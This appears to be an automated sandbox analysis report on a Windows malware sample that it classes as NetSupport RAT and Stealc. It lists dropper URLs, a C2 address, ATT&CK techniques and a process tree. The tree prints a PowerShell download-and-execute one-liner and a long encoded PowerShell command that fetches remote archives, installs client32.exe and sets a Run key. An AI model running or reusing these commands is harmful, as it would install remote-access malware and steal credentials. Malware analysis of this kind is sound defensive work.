netsupport | b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86

Analysis

max time kernel
94s
max time network
129s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
11-09-2024 15:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Size

6.8MB
MD5

acb755d083c876f6a80105c17cc61754
SHA1

8ccfc2b30402e76a59ed07873b0ccf589728fd22
SHA256

b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86
SHA512

2d26da0b24c61e05a66583b548672f00b4351c87669fb8b7e4e71a73da4a2c0e470d7c6aa8072976fe8ca2ac5ea6b75e41f54b426c0d1de06aa118a83283b70b
SSDEEP

196608:DzSpVt4hhiIbZg4T4hac7p6eDcGRY9Dc+/7/MS6a:DWp74hVbehacQeHwDc+/7zb

Score

10^/10

netsupport stealc workbaza credential_access discovery execution persistence rat spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.et-ba.com.tr/temp/b64_akam_kent_2708.ps1

Extracted

Language

ps1

Source

URLs

exe.dropper

https://calbyiris.com/fvz/f2v.zip

exe.dropper

https://calbyiris.com/fvz/f1v.zip

exe.dropper

https://calbyiris.com/fvz/f3v.zip

exe.dropper

https://calbyiris.com/fvz/f4v.zip

exe.dropper

https://calbyiris.com/fvf/

Extracted

Family

stealc

Botnet

Workbaza

http://5.35.36.211

Attributes

url_path
/cadb6378d4b16104.php

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 1 IoCs

flow	pid	Process
35	4868	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe

Executes dropped EXE 1 IoCs

pid	Process
852	client32.exe

Loads dropped DLL 13 IoCs

pid	Process
4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
852	client32.exe
852	client32.exe
852	client32.exe
852	client32.exe
852	client32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HDiskDefragm = "C:\\Users\\Admin\\AppData\\Roaming\\HDiskDefragm\\client32.exe"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4868	powershell.exe
2920	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
4868	powershell.exe
4868	powershell.exe
2920	powershell.exe
2920	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeSecurityPrivilege	852	client32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
852	client32.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1776 wrote to memory of 4588	1776	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe	84
PID 1776 wrote to memory of 4588	1776	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe	84
PID 1776 wrote to memory of 4588	1776	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe	84
PID 4588 wrote to memory of 4868	4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe	95
PID 4588 wrote to memory of 4868	4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe	95
PID 4588 wrote to memory of 4868	4588	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe	95
PID 4868 wrote to memory of 2920	4868	powershell.exe	97
PID 4868 wrote to memory of 2920	4868	powershell.exe	97
PID 4868 wrote to memory of 2920	4868	powershell.exe	97
PID 2920 wrote to memory of 852	2920	powershell.exe	100
PID 2920 wrote to memory of 852	2920	powershell.exe	100
PID 2920 wrote to memory of 852	2920	powershell.exe	100

C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
"C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1776
- C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
  "C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe"
  2⤵
  - Checks computer location settings
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4588
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('https://www.et-ba.com.tr/temp/b64_akam_kent_2708.ps1')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4868
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nOPRofIlE -exEcUTiONpOlI bypASS -WinDOWST HiD -ec JAA3AGMAcQBNAFEAYgA9ACcAaAB0AHQAcABzADoALwAvAGMAYQBsAGIAeQBpAHIAaQBzAC4AYwBvAG0ALwBmAHYAegAvAGYAMgB2AC4AegBpAHAAJwA7ACAAJABZAEcAUwBKAHkAPQAnADgATABmAHoAdQAuAHoAaQBwACcAOwAgAGMASABkAGkAcgAgACQAZQBuAFYAOgBhAFAAUABEAGEAdABhADsAIAAkAGEAUwBPAGkAQwBOAEcAPQAnAEgARABpAHMAawBEAGUAZgByAGEAZwBtACcAOwAgACQATwBjAHQAVABKAE4ATAA9ACcATAAxAFAANQBrAEcALgB6AGkAcAAnADsAIAAkAGkAcwBVAGwAYQA9ACcAaAB0AHQAcABzADoALwAvAGMAYQBsAGIAeQBpAHIAaQBzAC4AYwBvAG0ALwBmAHYAegAvAGYAMQB2AC4AegBpAHAAJwA7ACAAWwBOAEUAVAAuAHMARQByAHYAaQBjAGUAUABPAEkAbgB0AE0AYQBOAGEAZwBFAFIAXQA6ADoAUwBlAEMAdQByAEkAVABZAHAAUgBvAHQAbwBjAG8ATAAgAD0AIABbAE4ARQB0AC4AcwBFAEMAVQBSAGkAVAB5AHAAcgBPAHQAbwBjAE8AbABUAHkAUABlAF0AOgA6AHQATABTADEAMgA7ACAAJABVAHIAMgA0AGwAWABYAD0AZwBjAE0AIABTAFQAYQBSAHQALQBiAGkAdABzAHQAUgBBAE4AcwBGAGUAUgAgAC0ARQBSAFIAbwBSAGEAYwBUAEkAbwBOACAAUwBJAGwARQBOAFQATAB5AGMATwBOAFQAaQBOAFUAZQA7ACAAJABwADcAbQA3AHIAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbABiAHkAaQByAGkAcwAuAGMAbwBtAC8AZgB2AHoALwBmADMAdgAuAHoAaQBwACcAOwAgACQARQBqAHQAYQBPAD0AZwBjAE0AIABFAHgAcABhAG4ARAAtAEEAUgBDAEgASQB2AEUAIAAtAEUAcgBSAG8AcgBBAEMAVABJAG8AbgAgAFMASQBMAEUAbgBUAEwAeQBjAE8AbgBUAGkAbgB1AGUAOwAgACQASgA0ADUASwBwAFIAdwByAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBhAGwAYgB5AGkAcgBpAHMALgBjAG8AbQAvAGYAdgB6AC8AZgA0AHYALgB6AGkAcAAnADsAIAAkAGYAdQBSAFQANABHAFEAWgA9ACcAQwBlAG4AdwBnAC4AegBpAHAAJwA7ACAAJAB6AG4AOABpAEIAVQBHAD0AJwA5ADkANABVAHgALgB6AGkAcAAnADsAIAAkAGgARAB0AGEATQAyAFYAPQAiAHsAMAB9AFwAewAxAH0AIgAgAC0AZgAgACQARQBOAFYAOgBBAFAAcABEAGEAVABhACwAIAAkAGYAdQBSAFQANABHAFEAWgA7ACAAJABIAHMAaQBpAFIASwBWAD0ASgBvAGkAbgAtAHAAQQB0AGgAIAAtAHAAQQBUAGgAIAAkAEUATgBWADoAQQBQAHAARABhAFQAYQAgAC0AYwBIAGkATABkAFAAQQB0AGgAIAAkAFkARwBTAEoAeQA7ACAAJAA5ADcARABCADgAYwA9ACQARQBuAFYAOgBBAFAAUABEAGEAdABhACwAIAAkAE8AYwB0AFQASgBOAEwAIAAtAEoATwBJAE4AIAAnAFwAJwA7ACAAJAB6ADUAVgBkAFgAPQAkAGUATgBWADoAQQBQAFAAZABBAHQAYQArACcAXAAnACsAJAB6AG4AOABpAEIAVQBHADsAIAAkAEUAVQAzAGoAYwA9ACcAQgBpAFQAcwBhAEQATQBpAE4ALgBlAFgAZQAgAC8AdABSAEEAbgBzAGYARQByACAAUwBEAE4AWgBnADUAIAAvAGQAbwB3AE4AbABPAEEARAAgAC8AUABSAGkAbwByAEkAVAB5ACAAbgBPAFIAbQBBAGwAJwAsACAAJABpAHMAVQBsAGEALAAgACQAaABEAHQAYQBNADIAVgAgAC0AagBvAEkATgAgACcAIAAnADsAIAAkAFIAdAAzAFUATQBSADQAPQAnAEIAaQBUAHMAYQBEAE0AaQBOAC4AZQBYAGUAIAAvAHQAUgBBAG4AcwBmAEUAcgAgAFMARABOAFoAZwA1ACAALwBkAG8AdwBOAGwATwBBAEQAIAAvAFAAUgBpAG8AcgBJAFQAeQAgAG4ATwBSAG0AQQBsACAAJwArACQASgA0ADUASwBwAFIAdwByACsAJwAgACcAKwAkAEgAcwBpAGkAUgBLAFYAOwAgACQAQwBVAEMAawBoAD0AIgBCAGkAdABTAGEARABtAEkATgAuAGUAWABFACAALwB0AFIAQQBOAFMAZgBlAFIAIABGAEsATQB0AFQARQAgAC8AZABvAHcAbgBMAE8AQQBEACAALwBwAFIASQBvAFIAaQBUAHkAIABOAE8AcgBNAGEATAAgAHsAMAB9ACAAewAxAH0AIgAgAC0AZgAgACQANwBjAHEATQBRAGIALAAgACQAOQA3AEQAQgA4AGMAOwAgACQAdAA3AGcAZQBZAEIAbQA9ACIAJABFAG4AdgA6AGEAUABwAEQAYQBUAEEAXAAkAGEAUwBPAGkAQwBOAEcAIgA7ACAAJABxAEMANwBHAEMAPQAnAEIAaQBUAHMAYQBEAG0AaQBOAC4AZQB4AGUAIAAvAHQAUgBBAG4AUwBGAGUAcgAgAGsAbwA5AGwAQgAgAC8AZABvAHcAbgBMAE8AQQBkACAALwBwAFIASQBPAFIASQBUAFkAIABOAG8AUgBNAGEAbAAnACwAIAAkAHAANwBtADcAcgAsACAAJAB6ADUAVgBkAFgAIAAtAEoATwBpAG4AIAAnACAAJwA7ACAAaQBGACAAKAAkAEUAagB0AGEATwApACAAewAgAGkARgAgACgAJABVAHIAMgA0AGwAWABYACkAIAB7ACAAcwB0AGEAUgBUAC0AQgBJAHQAUwBUAFIAYQBOAHMARgBFAFIAIAAtAHMATwBVAFIAQwBFACAAJABwADcAbQA3AHIAIAAtAEQARQBzAHQAaQBOAGEAdABJAE8AbgAgACQAegA1AFYAZABYADsAIABzAHQAQQBSAHQALQBiAEkAdABTAFQAcgBBAE4AcwBGAEUAcgAgAC0AcwBPAFUAUgBDAEUAIAAkAEoANAA1AEsAcABSAHcAcgAgAC0AZABFAHMAdABJAG4AYQBUAGkATwBuACAAJABIAHMAaQBpAFIASwBWADsAIABzAFQAYQBSAFQALQBiAEkAVABTAHQAcgBBAE4AUwBGAEUAUgAgAC0AUwBvAFUAcgBjAGUAIAAkADcAYwBxAE0AUQBiACAALQBkAEUAcwBUAEkAbgBBAFQASQBvAE4AIAAkADkANwBEAEIAOABjADsAIABTAFQAYQBSAFQALQBiAEkAVABzAFQAcgBBAG4AcwBmAEUAUgAgAC0AUwBPAHUAcgBDAEUAIAAkAGkAcwBVAGwAYQAgAC0ARABFAHMAdABJAG4AYQB0AGkAbwBuACAAJABoAEQAdABhAE0AMgBWADsAIAB9ACAAZQBMAHMAZQAgAHsAaQBOAHYATwBrAEUALQBlAHgAUAByAEUAUwBzAGkATwBuACAALQBDAG8ATQBtAGEAbgBEACAAJABSAHQAMwBVAE0AUgA0ADsAIABpAE4AdgBPAGsARQAtAGUAeABQAHIARQBTAHMAaQBPAG4AIAAtAEMAbwBNAG0AYQBuAEQAIAAkAEMAVQBDAGsAaAA7ACAAaQBlAHgAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAHEAQwA3AEcAQwA7ACAAaQBlAHgAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAEUAVQAzAGoAYwA7ACAAfQAgAEUAeABQAEEATgBkAC0AYQBSAEMASABpAFYARQAgAC0AUABhAFQAaAAgACQASABzAGkAaQBSAEsAVgAgAC0ARABFAFMAdABpAG4AYQBUAGkATwBOAHAAYQB0AEgAIAAkAHQANwBnAGUAWQBCAG0AOwAgAGUAeABwAGEATgBkAC0AQQBSAGMASABJAHYAZQAgAC0AUABhAFQASAAgACQAOQA3AEQAQgA4AGMAIAAtAEQARQBTAFQAaQBuAEEAVABpAG8AbgBwAGEAdABIACAAJAB0ADcAZwBlAFkAQgBtADsAIABFAFgAcABhAE4AZAAtAEEAUgBjAGgAaQB2AGUAIAAtAHAAYQBUAEgAIAAkAHoANQBWAGQAWAAgAC0AZABlAHMAdABJAG4AYQB0AEkAbwBOAHAAYQB0AGgAIAAkAHQANwBnAGUAWQBCAG0AOwAgAGUAWABQAEEATgBEAC0AYQBSAGMAaABJAHYAZQAgAC0AUABBAHQAaAAgACQAaABEAHQAYQBNADIAVgAgAC0AZABlAFMAVABpAG4AQQB0AGkAbwBOAFAAYQBUAEgAIAAkAHQANwBnAGUAWQBCAG0AOwAgAHIARQBtAG8AVgBlAC0AaQB0AGUATQAgAC0AUABBAFQASAAgACQAegA1AFYAZABYADsAIABEAGUAbAAgAC0AcABhAFQAaAAgACQASABzAGkAaQBSAEsAVgA7ACAAcgBEACAALQBQAGEAVABIACAAJABoAEQAdABhAE0AMgBWADsAIABFAHIAQQBTAEUAIAAtAFAAYQB0AGgAIAAkADkANwBEAEIAOABjADsAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAFkAcwBtAFEASgA5AD0AJwBoAHQAdABwAHMAOgAvAC8AYwBhAGwAYgB5AGkAcgBpAHMALgBjAG8AbQAvAGYAdgBmAC8AJwA7ACAATgBpACAALQBQAGEAVABIACAAJABFAE4AVgA6AGEAcABwAEQAQQB0AEEAIAAtAE4AQQBtAGUAIAAkAGEAUwBPAGkAQwBOAEcAIAAtAEkAdABlAE0AVABZAHAARQAgACcAZABpAHIAZQBjAHQAbwByAHkAJwA7ACAAJAA0AG8ARwAzAFIATgA9AEAAKAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBUAEMAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBwAGMAaQBjAGEAcABpAC4AZABsAGwAJwAsACAAJwBQAEMASQBDAEwAMwAyAC4ARABMAEwAJwAsACAAJwByAGUAbQBjAG0AZABzAHQAdQBiAC4AZQB4AGUAJwAsACAAJwBOAFMATQAuAEwASQBDACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAbgBzAG0AXwB2AHAAcgBvAC4AaQBuAGkAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcASABUAEMAVABMADMAMgAuAEQATABMACcALAAgACcAbgBzAGsAYgBmAGwAdAByAC4AaQBuAGYAJwAsACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnACkAOwAgAGkARgAgACgAJABVAHIAMgA0AGwAWABYACkAIAB7ACAAJAA0AG8ARwAzAFIATgAgAHwAIABGAE8AUgBlAEEAYwBIACAAewAgACQAZwBGAFQANABDAGQARAA9ACQAWQBzAG0AUQBKADkAKwAkAF8AOwAgACQAcQBtAEUAcwBxAD0AIgB7ADAAfQBcAHsAMQB9ACIAIAAtAGYAIAAkAHQANwBnAGUAWQBCAG0ALAAgACQAXwA7ACAAcwBUAEEAUgB0AC0AQgBJAFQAUwB0AFIAYQBuAFMARgBFAFIAIAAtAFMATwB1AFIAQwBlACAAJABnAEYAVAA0AEMAZABEACAALQBEAGUAUwBUAEkAbgBBAFQAaQBvAE4AIAAkAHEAbQBFAHMAcQA7ACAAfQA7AH0AIABFAEwAUwBFACAAewAgACQANABvAEcAMwBSAE4AIAB8ACAAJQAgAHsAIAAkAGcARgBUADQAQwBkAEQAPQAkAFkAcwBtAFEASgA5ACsAJABfADsAIAAkAHEAbQBFAHMAcQA9ACIAJAB0ADcAZwBlAFkAQgBtAFwAJABfACIAOwAgACQAWQBuAFMASwBZAD0AJwBCAGkAdABzAEEAZABtAGkAbgAuAGUAWABFACAALwBUAHIAQQBOAFMAZgBlAFIAIABzAGwAeQBFAEUARABRAFMAIAAvAGQAbwB3AG4ATABPAGEAZAAgAC8AUAByAGkATwBSAGkAVABZACAATgBvAFIATQBhAGwAIAAnACsAJABnAEYAVAA0AEMAZABEACsAJwAgACcAKwAkAHEAbQBFAHMAcQA7ACAAJgAgACQAWQBuAFMASwBZADsAfQA7ACAAfQA7ACAAfQA7ACAAJABXAHMAMABQAHUASAB4AHEAPQBnAEkAIAAkAHQANwBnAGUAWQBCAG0AIAAtAGYAbwBSAGMARQA7ACAAJABXAHMAMABQAHUASAB4AHEALgBBAHQAdAByAEkAYgB1AHQAZQBzAD0AJwBIAGkAZABkAGUAbgAnADsAIAAkAHEAVQBzAEUAeQA9ACIAJAB0ADcAZwBlAFkAQgBtAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAIgA7ACAAQwBkACAAJAB0ADcAZwBlAFkAQgBtADsAIABuAGUAVwAtAGkAdABlAG0AcAByAG8AUABFAHIAdAB5ACAALQBQAEEAVABIACAAJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAALQBOAEEAbQBlACAAJABhAFMATwBpAEMATgBHACAALQB2AGEATABVAEUAIAAkAHEAVQBzAEUAeQAgAC0AcABSAG8AcABFAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwAgAHMAdABBAFIAVAAtAFAAUgBvAEMARQBTAHMAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7AA==
      4⤵
      Adds Run key to start application
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2920
    - - C:\Users\Admin\AppData\Roaming\HDiskDefragm\client32.exe
        
        "C:\Users\Admin\AppData\Roaming\HDiskDefragm\client32.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:852

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
92e30a0b91871941623a2e105d07e314

SHA1
23134a525dd43fe52390c159be2cfbabc4c2b842

SHA256
e88d09ca2ca237e3e4b6199fc970d399cc2497640dc5877a40b5ab444ed443f5

SHA512
59e123422b5c3aa2d7fa7bc0f08f6eeb27c4ec7c4cba88c502a2fc68ba989c3396f40a215033efd624a2f3b050e8f4f19aea629827e5913788527771969338a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
fd3109bc1f36a4cc43b6771dbaae6263

SHA1
a04ba8454cfa28d254a0e3e825b002e1a0ba4637

SHA256
abcc58a104cb1cf4984dd68e4692e5fc7b9cae495eb1d52fa89c04e4c8fae7b7

SHA512
c30930ab397cc0898a872b26a6c7dca353a57e5e17cb1afb813cb1d40aaabeb77d7aa1a5bd0027aa431ee31acfd1345fbf327cdc424e48b31c7fc77782d88d94

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17762\VCRUNTIME140.dll

Filesize
74KB

MD5
afa8fb684eded0d4ca6aa03aebea446f

SHA1
98bbb8543d4b3fbecebb952037adb0f9869a63a5

SHA256
44de8d0dc9994bff357344c44f12e8bfff8150442f7ca313298b98e6c23a588e

SHA512
6669eec07269002c881467d4f4af82e5510928ea32ce79a7b1f51a71ba9567e8d99605c5bc86f940a7b70231d70638aeb2f6c2397ef197bd4c28f5e9fad40312

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17762\_ctypes.pyd

Filesize
114KB

MD5
21e301d58c481660af1efdebc4ad63fe

SHA1
ec10719afcbd6317355bbe0de04beb3d5c067651

SHA256
003429b4e119dc08798aada64c13002b210507291afae8cace5eb0032754e78e

SHA512
fe06fcb3f6f3f76b7de0ea92ea4fb286c6f8643cbe0f34a9df9b354434aabe3941a3bf2028f3a2e61183f4c39ee2f80ec5dfdcd9854416423142142508a71493

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17762\_socket.pyd

Filesize
69KB

MD5
2df573607b053e4d8ba0eba9be96541c

SHA1
d41b40c468898c9a2e4d6be434c7eea57724b546

SHA256
a591d3054c741496889e1a427516d8aab89bb94636b96467213fa6449df9eb26

SHA512
21fb191b49092abf5bc0ab029fdff0a63b7b77ed4edbf13b0c74eb8d3e5a9ebd5ba8314c0f8293ad5c922c5ad0849a23d1fa05e1c6e3104c23aab85dcd095e56

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17762\base_library.zip

Filesize
781KB

MD5
d214306a963d6db9dbe73c65d9b7c23e

SHA1
e42d3786f3ecf2cffee2ca2b7821973630431231

SHA256
5dd6afe3439d4eb8673de441ed980825919110abc2b1360c7a02a3cc365fcca8

SHA512
76601a39f1e84eaf3257a4989a45b6e2ee8492788239bb8f42729bfdbfbd3a50949295fd459ee4d9649fd16c3815740d7bf8152c4b707432a2a480ced711473c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17762\libffi-7.dll

Filesize
28KB

MD5
bc20614744ebf4c2b8acd28d1fe54174

SHA1
665c0acc404e13a69800fae94efd69a41bdda901

SHA256
0c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57

SHA512
0c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17762\python39.dll

Filesize
4.3MB

MD5
84741db3367d6998108d22e03eaf2a71

SHA1
6564ab918223d0074dfbf9bc5d062fd3a2003079

SHA256
3e0c22d1451c3f3578850990f54916eb276bb45b951649d6478523566dfa8059

SHA512
1a6aa94ec97df73b23b0d5079bafa92c13f9786f5c488046e95804f4701baeecb1beb9fd96824a6009355321adb7319ac643af40ff0c6b01733050dab2b648c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI17762\select.pyd

Filesize
24KB

MD5
e2642d30be324bd86d711ada36797b85

SHA1
c474699a4853f0157708901213d3165530c45a69

SHA256
bb87be114067ab856067dbe74ba421c21cb0f36ad1960af0f5d61bda2e753fa2

SHA512
